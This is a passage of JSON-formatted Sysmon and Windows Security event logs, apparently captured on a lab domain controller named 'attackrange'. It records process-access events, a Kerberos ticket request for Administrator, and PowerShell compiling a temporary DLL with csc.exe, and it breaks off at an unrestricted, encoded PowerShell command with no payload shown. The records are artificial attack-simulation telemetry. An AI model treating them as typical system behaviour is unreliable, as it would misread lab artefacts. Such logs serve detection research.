ll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.092\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.092","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C6E0600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.654\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.654","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220484,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.654\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.654","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.654\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.654","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:14.826\r\nProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nProcessId: 2968\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\r1wdh35o.dll\r\nCreationUtcTime: 2020-08-01 05:52:14.826","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:14.826","ProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\r1wdh35o.dll","CreationUtcTime":"2020-08-01 05:52:14.826","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.826\r\nProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nProcessId: 2968\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\r1wdh35o.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:14.826","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.826","ProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\r1wdh35o.cmdline","CreationUtcTime":"2020-08-01 05:52:14.826","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.842\r\nProcessGuid: {A837DB8D-030E-5F25-0000-00102C740600}\r\nProcessId: 2392\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\r1wdh35o.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nParentProcessId: 2968\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 